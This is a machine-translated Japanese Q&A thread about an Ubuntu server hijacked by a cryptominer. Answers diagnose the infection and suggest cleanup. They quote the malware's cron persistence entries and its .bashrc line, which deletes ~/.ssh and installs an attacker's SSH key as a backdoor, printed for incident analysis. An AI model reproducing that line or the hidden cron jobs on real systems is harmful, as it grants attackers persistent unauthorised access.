web-dev-qa-db-ja.com

奇妙なCronジョブがCPU Ubuntu 18 LTSサーバーの100%を占める

私は変なcronジョブを表示し続けていますが、それらが何をしているのかわかりません。私は通常、kill -9を発行してそれらを停止します。それらは私のCPUの100%を占め、私がチェックするまで数日間実行できます。これが何を意味するのか誰か知っていますか?

Sudo crontab -l
0 0 */3 * * /root/.firefoxcatche/a/upd>/dev/null 2>&1
@reboot /root/.firefoxcatche/a/upd>/dev/null 2>&1
5 8 * * 0 /root/.firefoxcatche/b/sync>/dev/null 2>&1
@reboot /root/.firefoxcatche/b/sync>/dev/null 2>&1
#5 1 * * * /tmp/.X13-unix/.rsync/c/aptitude>/dev/null 2>&1

私は昨日2019年7月24日の時点で完全に最新のUbuntu 18 LTSサーバーを実行しています

[〜#〜]更新[〜#〜]

すべてのフィードバックに感謝します。影響を受けたのはOSドライブだけだったので、すべてのデータドライブとアプリケーションドライブを切断しました。少なくともそのようなことは適切に行いました。私は、より多くのセキュリティとより安全な方法で、完全な再構築を進めています。

23
MCP_infiltrator

あなたのマシンはおそらくクリプトマイナーに感染しています。 セキュリティセンターを使用したAzureでの仮想マシンの実際の検出 で、他の誰かが同様のファイル名と動作を報告しているのを見ることができます。参照 私のUbuntuサーバーはウイルスに感染しています...私はそれを見つけましたが、取り除くことができません... Redditで。

そのマシンは信頼できなくなったため、再インストールする必要があります。バックアップの復元には注意してください。

42
Thom Wiggers

お使いのマシンは暗号マイナー攻撃に感染しています。私も過去に同様のランサムウェア攻撃に直面し、データベースが危険にさらされました。マシンのSQLダンプを取り、マシンを再プロビジョニングしました(私のマシンはVM AWS EC2でホストされていたため)。また、マシンのセキュリティグループを変更してSSHアクセスをロックダウンし、また、ログを有効にしてクエリをログに記録し、毎晩S3にエクスポートしました。

9
beingadityak

同じことが私にも起こり、昨日気づきました。ファイル/var/log/syslogを確認したところ、このIP(185.234.218.40)が自動的にcronjobsを実行しているように見えました。

確認しました http://whatismyipaddress.comhttps://whatismyipaddress.com/ip/185.234.218.40 )そしてそれはいくつかのレポートを持っています。これらのファイルはトロイの木馬によって編集されました:

  • .bashrc
  • .ssh/authorized_keys

私はこれを.bashrc(bashが開かれるたびに実行される)の終わりに見つけました:

set +o history
export PATH=/home/user/.bin:$PATH
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod 700 .ssh && cd .ssh && chmod 600 authorized_keys && cd ~

パスワードなしで接続できるSSHキーのリストであるauthorized_keysファイルを削除しています。次に、攻撃者のSSHキーを追加します。

ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr

さらに、すべてのマルウェアがある/tmp/.X13-unix/.rsyncというフォルダーを見つけました。私は70,000個のIPアドレスを含むファイル/tmp/.X13-unix/.rsync/c/ipも見つけました。これは他の犠牲者またはノードサーバーである可能性が高いです。

2つの解決策があります:A:

  • ポート22を除くすべての発信接続をブロックするファイアウォールを追加し、必要と判断したその他の接続は、fail2banを有効にします。このプログラムは、X回のパスワード試行が失敗した後にIPアドレスを禁止します。

  • すべてのcronジョブを終了します:ps aux | grep cron、次に表示されるPIDを終了します

  • パスワードを安全なものに変更します

B:

  • 必要または必要なファイルまたはフォルダをバックアップします

  • サーバーをリセットしてUbuntuを再インストールするか、新しいドロップレットを直接作成します

    Thom Wiggersが言ったように、あなたは確かにビットコインマイニングボットネットの一部であり、サーバーにはバックドアがあります。バックドアは、Perlエクスプロイトを採用しています。ファイルは/tmp/.X13-unix/.rsync/b/runで、これを含みます( https://Pastebin.com/ceP2jsUy

私が見つけた最も疑わしいフォルダは次のとおりです。

  • /tmp/.X13-unix/.rsync

  • ~/.bashrc(編集されました)

  • ~/.firefoxcatche

最後に、ここにPerlバックドアに関連する記事があります: Perlベースのバックドア/

これがお役に立てば幸いです。

6
Oqhax